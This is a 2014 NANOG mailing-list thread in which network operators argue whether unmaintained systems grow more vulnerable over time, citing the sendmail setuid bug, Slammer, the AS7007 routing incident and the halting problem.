Unfortunately, that page contains near the top the ludicrous and impossible assertion:
""Familiarity Breeds Contempt: The Honeymoon Effect and the Role of Legacy Code in Zero-Day Vulnerabilities", by Clark, Fry, Blaze and Smith makes clear that ignoring these devices is foolhardy; unmaintained systems become more vulnerable, with time."
It is impossible for unchanged/unmaintained systems to develop more vulnerabilities with time. Perhaps what these folks mean is that "vulnerabilities which existed from the time the system was first developed become more well known over time".
That's not actually true. A running process, instantiated from a file of object code, derives its behavior from a number of interfaces; to the kernel, the libc, the filesystem of the machine it's run on, and even network interfaces off the machine.
While the device itself may be -- or seem to be -- immutable, unless you're certain that *nothing around it changed either*, then you cannot assume that things became vulnerabilities *as deployed* which were not so previously.
Ok, yes, that's partially equivalent to what you said, at least in the case of, say, consumer routers, booting from flash. But for code running on real OSs, it's possible for a vulnerability to "appear" because something under or beside the code got updated, turning something which could not be attacked into something which could.
I haven't an example case, but it is theoretically possible.
No, it is not. If you have "changed something" then the system is not unchanged. For example, if you have updated libc, applied a patch to something, changed the network adapter and therefore the drivers, you have changed the "vulnerability profile" of the box (or, more correctly everything in the path of direct connection to the change). This is why there is change control. So that when you "make a change" you can assess the impact of the change on *everything* it affects. A running process on a commodity OS on a given box will not spontaneously have vulnerabilities created or destroyed save and except by a change made within the "sphere of influence" (meaning, in that case, anything inside "the box"). By very definition an "unmaintained" system is not subjected to change, and therefore the vulnerability profile cannot change. For example, if I build a Linux machine running Slackware 1.0 (I had one of those running for many years) that is performing a specific task, and that "box" is not maintained (that is, no changes are made to any part of the software or hardware comprising the box), then the vulnerability profile does not change despite the passage of 15 years of time. It cannot spontaneously have a new vulnerability created five years after commissioning that did not exist at the time it was commissioned, nor can one that existed at commissioning go away. By the same token, external change -- for example increasing the network transit of the network to which "the box" is connected from an ISDN connection to a DS3 -- does not change the "vulnerability profile" of the box itself; and, cannot cause a new vulnerability to be created or destroyed within that box. Such an "external change" may affect the likelihood of exploitation of a pre-existing vulnerability, but cannot create a new vulnerability nor cause one that exists to go away. This is why XP (for example) becomes *more* secure when Microsoft support ends, not *less*. It is no longer subject to change and therefore its vulnerability profile has become fixed, rather than a perpetually moving target. From the time the box becomes "no longer subject to change" it will have its vulnerability profile fixed at that point right up until it is decommissioned (or decommissions itself by, for example, having the magic smoke escape). This then leads to the assessment of the value of "vendor support". "Vendor Support" that is predicated on a perpetual requirement to make change for change sake (such as Microsoft updates) is a negative value proposition and is unmaintainable. It is impossible to perform the required re-assessments at the fantastic rate of change imposed by such systems. On the other hand, "Vendor Support" which does not require perpetual change, has a value and that value is the difference between the future value of the series of recurring "support" fee's and the cost of "replacement" of the affected component when a "change" has been assessed to be necessary, either to remove a pre-existing vulnerability (which may no longer be able to be mitigated, or may be excessively expensive to mitigate) or for new features (or hardware warranty services, for example, in the specific case of SmartNet contracts). The decision to implement the change (and thus an evaluable shift in the vulnerability profile, which becomes fixed at the time the change is made and continues unchanged, right up until the next change occurs) is subject to rational management of change processes and rational analysis. For systems predicated on massive continual change the impact of which cannot be assessed (such as most "Microsoft" products, or Adobe Flash, or, <there are several others>) leads to a complacent dependence on the vendor due to a complete inability to rationally assess the vulnerabilities contained in such systems or anything "within the sphere of direct influence" of them. This then has the effect of imposing "dependence" and "lock in" to the vendor. Commodity computing hardware vendors (Dell is an example) do the same thing as well, deliberately imposing uncontrollable change with deliberate requirements for implementation of non-consequent change (ie, deliberately removing compatibility in order to force upgrades to new versions of Microsoft Windows), in order to "lock" their customers into their products and institute dependent behaviour. Interestingly the behaviour of vendors and the customers of vendors with such practices is remarkably similar to the behavioural traits displayed by crack addicts and their dealers.
On Sat, 27 Sep 2014 21:10:28 -0400, Jay Ashworth said:
I haven't an example case, but it is theoretically possible.
The sendmail setuid bug, where it failed to check the return code because it was *never* possible for setuid from root to non-root to fail... ... until the Linux kernel grew new features.
This is another case where a change was made. If the change had not been made (implement the new kernel) then the vulnerability would not have been introduced. The more examples people think they find, the more it proves my proposition. Vulnerabilities can only be introduced or removed through change. If there is no change, then the vulnerability profile is fixed.
-----Original Message----- From: NANOG [mailto:nanog-bounces@nanog.org] On Behalf Of Valdis.Kletnieks@vt.edu Sent: Saturday, 27 September, 2014 22:47 To: Jay Ashworth Cc: NANOG Subject: Re: update
On Sat, 27 Sep 2014 21:10:28 -0400, Jay Ashworth said:
I haven't an example case, but it is theoretically possible.
The sendmail setuid bug, where it failed to check the return code because it was *never* possible for setuid from root to non-root to fail... ... until the Linux kernel grew new features.
On Sat, Sep 27, 2014 at 11:57 PM, Keith Medcalf <kmedcalf@dessus.com> wrote:> This is another case where a change was made.
If the change had not been made (implement the new kernel) then the vulnerability would not have been introduced. [...] The more examples people think they find, the more it proves my proposition. Vulnerabilities can only be introduced or removed through change. If there is no change, then the vulnerability profile is fixed.
I see what you did there... you expanded the boundaries of the "system" to include not just the application code but more and more of the environment, CPU, Kernel, .... The problem is, before it is an entirely correct statement to assert that a zero entropy system never develops new vulnerabilities, you have to expand the boundaries of the "system" to include the entire planet. Suppose you have a vulnerability that can only be exposed if port 1234 is open. That's no problem, you blocked port 1234 on the external firewall, therefore the application cannot be considered to be vulnerable during testing. A few years later you replace the firewall with a NAT router that doesn't block port 1234. Oops! Now you have to consider the entire network and the Firewall to be part of the application / internal part of the system. And it doesn't end there. Eventually for the statement to remain true, the boundaries of the system which 'cannot develop a vulnerability unless it changes' have to expand in order to include the attackers' brains. "If the attacker discovers a new trick or kind of attack they did not know before" then a change to the system has occured. -- -JH
On Sunday, 28 September, 2014 06:39, Jimmy Hess <mysidia@gmail.com> said:
On Sat, Sep 27, 2014 at 11:57 PM, Keith Medcalf <kmedcalf@dessus.com> wrote:> This is another case where a change was made.
If the change had not been made (implement the new kernel) then the vulnerability would not have been introduced.
The more examples people think they find, the more it proves my proposition. Vulnerabilities can only be introduced or removed through change. If there is no change, then the vulnerability profile is fixed.
I see what you did there... you expanded the boundaries of the "system" to include not just the application code but more and more of the environment, CPU, Kernel, ....
No, those are part of the system and have a direct effect on the "application code". Whether the network connection is two tin cans and a string, twisted pair or fiber is irrelevant. Whether you are located on the third floor or the fourth floor is (likely) irrelevant. However, changing the network connection from two tin cans and a string to fiber is relevant if it affects the system. Such an effect would be a change of the network interface hardware and the requisite change in drivers. If the existing hardware and software can already handle both fiber and tin cans and string, then the change cannot affect the system since you are not changing anything upon which operation of the system is dependent.
The problem is, before it is an entirely correct statement to assert that a zero entropy system never develops new vulnerabilities, you have to expand the boundaries of the "system" to include the entire planet.
Incorrect. The whole planet does not directly affect the system. Well, that is not entirely true. There could be an earthquake that knocks the building down. Presumably you have mitigations in place for that -- usually a continuity and recovery plan. The planet could also be struck by a meteor causing an extinction level event to occur. There would probably be no need to mitigate that.
Suppose you have a vulnerability that can only be exposed if port 1234 is open. That's no problem, you blocked port 1234 on the external firewall, therefore the application cannot be considered to be vulnerable during testing.
The first action would be to disable the vulnerable service using port 1234, assuming that it is unnecessary. If it is necessary for some use or cannot be disabled, then you either mitigate the vulnerability by filtering in an external firewall, or decide to accept the risk of operating with a (possible) known vulnerability. These actions do not remove the vulnerability -- they mitigate exploit of the vulnerability. The vulnerability is still there.
A few years later you replace the firewall with a NAT router that doesn't block port 1234.
Oops! Now you have to consider the entire network and the Firewall to be part of the application / internal part of the system.
No, they are part of the mitigation for the vulnerability in the first system. You have not changed the first system, you have decided to no longer mitigate its vulnerability. Presumably you did this based on a rational assessment of the risks and benefits of doing so because you evaluated the effect of the change to the firewall, noted that port 1234 would no longer be filtered, and as a result the mitigation for the vulnerability in the first system would no longer be in place and that exploit of that vulnerability was now possible.
And it doesn't end there. Eventually for the statement to remain true, the boundaries of the system which 'cannot develop a vulnerability unless it changes' have to expand in order to include the attackers' brains.
But you did not change the fact that port 1234 in the first system contains a vulnerability. It was vulnerable from the get-go so you implemented a mitigation. You did not make the vulnerability "go away" you merely reduced the risk of exploit to an acceptable level. When you changed the firewall system you did not introduce a vulnerability in the first system. You merely decided to change the risk of exploit of a pre-existing condition.
"If the attacker discovers a new trick or kind of attack they did not know before" then a change to the system has occurred.
No. Either you have already addressed the possibility of the vulnerability existing and how it might be exploited, or you have not. If you did not consider the possibility that of the vulnerability, then upon learning of its existence you either need to implement a change to fix it, or implement a mitigation of some type. Conversely, if adequate mitigation is already in place or the vulnerability is moot (for example, the vulnerable service is externally filtered or is disabled), then an increase in the knowledge of the attacker is irrelevant.
----- Original Message -----
From: "Keith Medcalf" <kmedcalf@dessus.com>
The problem is, before it is an entirely correct statement to assert that a zero entropy system never develops new vulnerabilities, you have to expand the boundaries of the "system" to include the entire planet.
Incorrect. The whole planet does not directly affect the system. Well, that is not entirely true. There could be an earthquake that knocks the building down. Presumably you have mitigations in place for that -- usually a continuity and recovery plan. The planet could also be struck by a meteor causing an extinction level event to occur. There would probably be no need to mitigate that.
"The Internet is the only endeavour of man in which a single-character typographical error in a file on a computer on the other side of the planet *which you do not even know exists* can take your entire business off line for the better part of a day." -- Someone, in the wake of the (I think) Turkish YouTube BGP hijacking; damn if I remember who. I might be embellishing. :-) Cheers, -- jra -- Jay R. Ashworth Baylink jra@baylink.com Designer The Things I Think RFC 2100 Ashworth & Associates http://www.bcp38.info 2000 Land Rover DII St Petersburg FL USA BCP38: Ask For It By Name! +1 727 647 1274
On September 28, 2014 at 13:22 jra@baylink.com (Jay Ashworth) wrote:
"The Internet is the only endeavour of man in which a single-character typographical error in a file on a computer on the other side of the planet *which you do not even know exists* can take your entire business off line for the better part of a day."
-- Someone, in the wake of the (I think) Turkish YouTube BGP hijacking; damn if I remember who. I might be embellishing. :-)
Oh I dunno. I know someone who accidentally brought down the entire Manhattan phone system (monopoly, pre-mobile days) installing a carefully tested patch with a hot failover running (oh well, the best laid schemes o' Mice an' Men, Gang aft agley.) Sure, that was just Manhattan, and of course everyone on the other side of those connections. -- -Barry Shein The World | bzs@TheWorld.com | http://www.TheWorld.com Purveyors to the Trade | Voice: 800-THE-WRLD | Dial-Up: US, PR, Canada Software Tool & Die | Public Access Internet | SINCE 1989 *oo*
On Sun, 28 Sep 2014 13:22:57 -0400, Jay Ashworth said:
"The Internet is the only endeavour of man in which a single-character typographical error in a file on a computer on the other side of the planet *which you do not even know exists* can take your entire business off line for the better part of a day."
-- Someone, in the wake of the (I think) Turkish YouTube BGP hijacking; damn if I remember who. I might be embellishing. :-)
"A distributed system is one in which the failure of a computer you didn't even know existed can render your own computer unusable." -- Leslie Lamport, 1987. http://research.microsoft.com/en-us/um/people/lamport/pubs/distributed-syste...
----- Original Message -----
From: "Keith Medcalf" <kmedcalf@dessus.com>
From: NANOG [mailto:nanog-bounces@nanog.org] On Behalf Of Valdis.Kletnieks@vt.edu
On Sat, 27 Sep 2014 21:10:28 -0400, Jay Ashworth said:
I haven't an example case, but it is theoretically possible.
The sendmail setuid bug, where it failed to check the return code because it was *never* possible for setuid from root to non-root to fail... ... until the Linux kernel grew new features.
This is another case where a change was made.
If the change had not been made (implement the new kernel) then the vulnerability would not have been introduced.
The more examples people think they find, the more it proves my proposition. Vulnerabilities can only be introduced or removed through change. If there is no change, then the vulnerability profile is fixed.
[ quoting fixed because you were too lazy ] We have established, Keith, that you place the boundary of the object for which an end-deployer has administrative control in a different place for the purpose of assigning blame than most other people seem to, yes. The sendmail maintainers are *NOT RESPONSIBLE* for avoiding exploits that cannot happen in any available or planned deployment environment, nor for decisions made by the creators of those environments which *cause their code to become exploitable ex-post-facto*. That's the point which I see being made here. If that's orthogonal to your argument, so be it. Could we drop this now? Cheers, -- jra -- Jay R. Ashworth Baylink jra@baylink.com Designer The Things I Think RFC 2100 Ashworth & Associates http://www.bcp38.info 2000 Land Rover DII St Petersburg FL USA BCP38: Ask For It By Name! +1 727 647 1274
On Fri, Sep 26, 2014 at 11:11 PM, Keith Medcalf <kmedcalf@dessus.com> wrote:
On Friday, 26 September, 2014 08:37,Jim Gettys <jg@freedesktop.org> said:
""Familiarity Breeds Contempt: The Honeymoon Effect and the Role of Legacy Code in Zero-Day Vulnerabilities", by Clark, Fry, Blaze and Smith makes clear that ignoring these devices is foolhardy; unmaintained systems become more vulnerable, with time."
It is impossible for unchanged/unmaintained systems to develop more vulnerabilities with time. Perhaps what these folks mean is that "vulnerabilities which existed from the time the system was first developed become more well known over time".
Keith, Any statement can be made foolish if you tweak the words a little. They said, "Unmaintained systems become more vulnerable with time," a reasonable and possibly correct claim. You paraphrased it as, "unmaintained systems develop more vulnerabilities with time," which is, of course, absurd. The vulnerabilities were there the whole time, but the progression of discovery and dissemination of knowledge about those vulnerabilities makes the systems more vulnerable. The systems are more vulnerable because the rest of the world has learned more about how those systems may be successfully attacked. Regards, Bill Herrin -- William Herrin ................ herrin@dirtside.com bill@herrin.us Owner, Dirtside Systems ......... Web: <http://www.dirtside.com/> May I solve your unusual networking challenges?
On Sunday, 28 September, 2014 00:39, William Herrin said:
On Fri, Sep 26, 2014 at 11:11 PM, Keith Medcalf <kmedcalf@dessus.com> wrote:
On Friday, 26 September, 2014 08:37,Jim Gettys <jg@freedesktop.org> said:
""Familiarity Breeds Contempt: The Honeymoon Effect and the Role of Legacy Code in Zero-Day Vulnerabilities", by Clark, Fry, Blaze and Smith makes clear that ignoring these devices is foolhardy; unmaintained systems become more vulnerable, with time."
It is impossible for unchanged/unmaintained systems to develop more vulnerabilities with time. Perhaps what these folks mean is that "vulnerabilities which existed from the time the system was first developed become more well known over time".
Keith,
Any statement can be made foolish if you tweak the words a little. They said, "Unmaintained systems become more vulnerable with time," a reasonable and possibly correct claim. You paraphrased it as, "unmaintained systems develop more vulnerabilities with time," which is, of course, absurd.
The vulnerabilities were there the whole time, but the progression of discovery and dissemination of knowledge about those vulnerabilities makes the systems more vulnerable. The systems are more vulnerable because the rest of the world has learned more about how those systems may be successfully attacked.
You are absolutely correct, Bill. The truly correct statement of affairs is that the pre-existing vulnerabilities, which have not been mitigated, become more likely to be exploited over time. That premise would change the tenor of the paper entirely from crack addict encouragement to giving the useful advice that the issue stems not from the failure of the dealer to continue providing more crack, but rather from the consumers failure to realize that smoking crack is dangerous and may be deleterious to one's health unless suitable precautions are taken before engaging in the activity. If one fully and correctly assess the avenues by which exploitation may occur and fully mitigates those avenues of attack, then the system, although unmaintained, does not become subject to increased likelihood of having vulnerabilities exploited over time.
Regards, Bill Herrin
On Sun, 28 Sep 2014 02:39:15 -0400, William Herrin said:
The vulnerabilities were there the whole time, but the progression of discovery and dissemination of knowledge about those vulnerabilities makes the systems more vulnerable. The systems are more vulnerable because the rest of the world has learned more about how those systems may be successfully attacked.
Hopefully, Keith will admit that *THAT* qualifies as a "change" in his book as well. If attackers are coming at you with an updated copy of Metasploit, things have changed....
On Sunday, 28 September, 2014 14:47, Valdis.Kletnieks@vt.edu said:
On Sun, 28 Sep 2014 02:39:15 -0400, William Herrin said:
The vulnerabilities were there the whole time, but the progression of discovery and dissemination of knowledge about those vulnerabilities makes the systems more vulnerable. The systems are more vulnerable because the rest of the world has learned more about how those systems may be successfully attacked.
Hopefully, Keith will admit that *THAT* qualifies as a "change" in his book as well. If attackers are coming at you with an updated copy of Metasploit, things have changed....
Sorry to disappoint, but those are not changes that make the system more vulnerable. They are externalities that may change the likelihood of exploitation of an existing vulnerability, but does not create any new vulnerability. Again, if the new exploit were targeting a vulnerability which was fully mitigated already and thus could not be exploited, there has not even been a change in likelihood of exploit or risk.
On Sun, 28 Sep 2014 15:06:18 -0600, "Keith Medcalf" said:
Hopefully, Keith will admit that *THAT* qualifies as a "change" in his book as well. If attackers are coming at you with an updated copy of Metasploit, things have changed....
Sorry to disappoint, but those are not changes that make the system more vulnerable. They are externalities that may change the likelihood of exploitation of an existing vulnerability, but does not create any new vulnerability. Again, if the new exploit were targeting a vulnerability which was fully mitigated already and thus could not be exploited, there has not even been a change in likelihood of exploit or risk.
So tell us Keith - since you said earlier that properly designed systems will already have 100% mitigations against these attackes _that you don't even know about yet_, how exactly did you design these mitigations? (Fred Fish's thesis paper, where he shows that malware detection is equivalent to the Turing Halting Problem, is actually relevant here). In particular, how did you mitigate attacks that are _in the data stream that you're charging customers to carry_? (And yes, there *have* been fragmentation attacks and the like - and I'm not aware of a formal proof that any currently shipping IP stack is totally correct, either, so there may still be unidentified attacks).
On 09/28/2014 04:50 PM, Valdis.Kletnieks@vt.edu wrote:
On Sun, 28 Sep 2014 15:06:18 -0600, "Keith Medcalf" said:
Sorry to disappoint, but those are not changes that make the system more vulnerable. They are externalities that may change the likelihood of exploitation of an existing vulnerability, but does not create any new vulnerability. Again, if the new exploit were targeting a vulnerability which was fully mitigated already and thus could not be exploited, there has not even been a change in likelihood of exploit or risk.
So tell us Keith - since you said earlier that properly designed systems will already have 100% mitigations against these attackes _that you don't even know about yet_, how exactly did you design these mitigations? (Fred Fish's thesis paper, where he shows that malware detection is equivalent to the Turing Halting Problem, is actually relevant here).
In particular, how did you mitigate attacks that are _in the data stream that you're charging customers to carry_? (And yes, there *have* been fragmentation attacks and the like - and I'm not aware of a formal proof that any currently shipping IP stack is totally correct, either, so there may still be unidentified attacks).
For that matter, has the *specification* of tcp/ip been proven to be "correct" in any complete way? In particular is it correct in any useful sense in the face of attackers that are ready and willing to spoof any possible feature of tcp/ip and its applications? (e.g. spam protection involves turning several MUST clauses from 821/822 to MUST NOT; the specs were not themselves reasonable in the face of determined attackers. And unfortunately Postel's famous maxim fails in the face of determined attackers, or at least the definition of "liberal" has to be tempered a lot.) The main serious effects of slammer, for example, were not directly from the worm itself, but due to the fact that the worm generated random addresses (at about 30k pps on a 100meg ethernet) without regard to "address family", and most default router's cpus were overwhelmed issuing lots of "network unreachable" icmp messages (which I think were a MUST at the time). Now that we've run out of spare v4 addresses, we wouldn't get so many unreachables :-) Fortunately most of our vulnerable customers back then were behind T1's so it didn't really hit us too badly. The only real workaround at the time was to disable unreachables, which has other undesirable side effects when the customers are mostly behaving. (Unplugging worked best.) (and at least that worm didn't write anything to disk, so a reboot fixed it for a while...) I know that there are features (e.g. fragmentation, source routing, even host/net unreachable etc etc) in the spec that fall down badly in the face of purposeful attacks. And things like the 7007 incident, where DATA passing between only a few nodes in the larger internet caused a very large-scale cascading failure. Jay mentioned another; there were approximations to 7007 a few times a year for several years after that incident (one involved routing the whole internet through Sweden). Mitigations for things like that are time-varying (e.g. IRR, if enough people actually used it (and in the face of tcp/ip forgery, that isn't sufficient either)...), and indeed one has to include the entire internet (and all of the people running it) as part of the system for that kind of analysis to mean anything. And can anyone prove that any one of the 7007-like incidents were really accidents or not? For that matter, maybe they were "normal accidents" (see Perrow - recommended reading for anyone involved with complex systems which the internet certainly qualifies (The internet is *much* more complex than the phone system, and there must be people in NANOG who remember the fallout from the Hinsdale fire (fast busy, anyone? Even in Los Angeles...)). (if one believes that 7007 was accidental, then it was induced by a combination of a misfeature in ios (11.x?) (mitigated with some of the "address-family" features in 12.x, though I don' t know if that was the intent) and a serious lack of documentation in matters concerning BGP. And a lack of error-checking outside that site (though IRR was the only source of check-data at the time and was (still is?) woefully incomplete.) The halting problem comes up in connection with _data_ handling in any computer with even a language interpreter (e.g. is browser-based javascript complete enough for the halting problem to apply to it? I think so. Java certainly is, though most browser-based java is supposed to be sandboxed. Perl, python, ruby, php all are.) (and in any real piece of equipment, can any of these make permanent state changes to the retained memory (flash or disk) in the computer? If so then this halting problem equivalence gives us trouble even if no changes are made to any executable programs (including shared libs) that came with the computer.) (especially true if the box is a router with any sort of dynamic routing, even ARP/NDP) How, for example, am I to know a priori for all possible <script src= strings, the difference between a 3rd party download of jquery and a malicious downloader *before running the download* (for that matter, even after...) Whitelisting does not help here in the face of attackers that spoof protocol features, in this case filenames and/or DNS. Noscript and related (e.g. chrome's script protection) whitelist whole sites, which is nowhere near granular enough, but even then is a pain for the user to manage. If the user is the proverbial grandmother, it is probably impossible to manage. -- Pete
On Mon, 29 Sep 2014 00:32:49 -0500, Pete Carah said:
The halting problem comes up in connection with _data_ handling in any computer with even a language interpreter (e.g. is browser-based javascript complete enough for the halting problem to apply to it?
The halting problem applies to *any* language/system that's Turing-complete. And the bar is *really* low for that. If you have an increment or decrement operator, a branch operator, and a test-and-skip-on-zero, you're Turing-complete. In fact, you can design a CPU with *one* opcode that's Turing complete. Part of the fun is that since there's only one opcode, you can omit it, and then instructions consist only of operand addresses. Then remember that von Neumann architectures allow self-modifying code.... http://en.wikipedia.org/wiki/One_instruction_set_computer
----- Original Message -----
From: "Valdis Kletnieks" <Valdis.Kletnieks@vt.edu>
On Sun, 28 Sep 2014 02:39:15 -0400, William Herrin said:
The vulnerabilities were there the whole time, but the progression of discovery and dissemination of knowledge about those vulnerabilities makes the systems more vulnerable. The systems are more vulnerable because the rest of the world has learned more about how those systems may be successfully attacked.
Hopefully, Keith will admit that *THAT* qualifies as a "change" in his book as well. If attackers are coming at you with an updated copy of Metasploit, things have changed....
I will actually grant to Keith this: the thing he's saying, actually is true. If you change *anything* on a computer, its attack surface may change one way or another. The question is: which of those things can you be reliably be expected to know about. And whom you are. If you are the developer of Sendmail, you can't be expected to know that *a change to the API of Linux* will make something attackable; there are too many possible changes, which no one is positing at any given moment, and that way lies madness. Because that's true, you can't be expected to warn your users of it, either, just as the manufacturer of concrete used to build a bridge could be expected to warn people who build and use the bridge that "the creation of a nanobot that likes to eat portland cement might cause your bridge to crumble". It's true, but it's not especially helpful. To anyone. Cheers, -- jra -- Jay R. Ashworth Baylink jra@baylink.com Designer The Things I Think RFC 2100 Ashworth & Associates http://www.bcp38.info 2000 Land Rover DII St Petersburg FL USA BCP38: Ask For It By Name! +1 727 647 1274
--As of September 25, 2014 4:05:16 AM +0900, Randy Bush is alleged to have said:
there is an update out you want. badly. debian/ubuntu admins may want to apt-get update/upgrade or whatever freebsd similarly can not speak for other systems
--As for the rest, it is mine. FreeBSD (and other BSDs, as far as I can tell) are not affected unless the admin has installed bash specifically; it's not part of the default install. It may however have been installed as part of the requirements for something else. This also should mean that the vulnerability is a bit more limited than in systems that use bash for /bin/sh: Even if you've installed bash, you aren't as likely to be running it in CGI or other similar contexts. (Not that that means it's blocked entirely if you've installed it, but it should help.) As of Wednsday afternoon, FreeBSD ports had the update but packages did not yet. Daniel T. Staal --------------------------------------------------------------- This email copyright the author. Unless otherwise noted, you are expressly allowed to retransmit, quote, or otherwise use the contents for non-commercial purposes. This copyright will expire 5 years after the author's death, or in 30 years, whichever is longer, unless such a period is in excess of local copyright law. ---------------------------------------------------------------
participants (24)
-
Alain Hebert
-
Barry Shein
-
Brandon Whaley
-
Chris Adams
-
Daniel Jackson
-
Daniel Staal
-
Hugo Slabbert
-
Jared Mauch
-
Jay Ashworth
-
Jim Gettys
-
Jim Popovitch
-
Jimmy Hess
-
JoeSox
-
Joly MacFie
-
Keith Medcalf
-
Kenneth Finnegan
-
Michael Thomas
-
Mikael Abrahamsson
-
Pete Carah
-
Randy Bush
-
Spencer Gaw
-
Valdis.Kletnieks@vt.edu
-
Will Yardley
-
William Herrin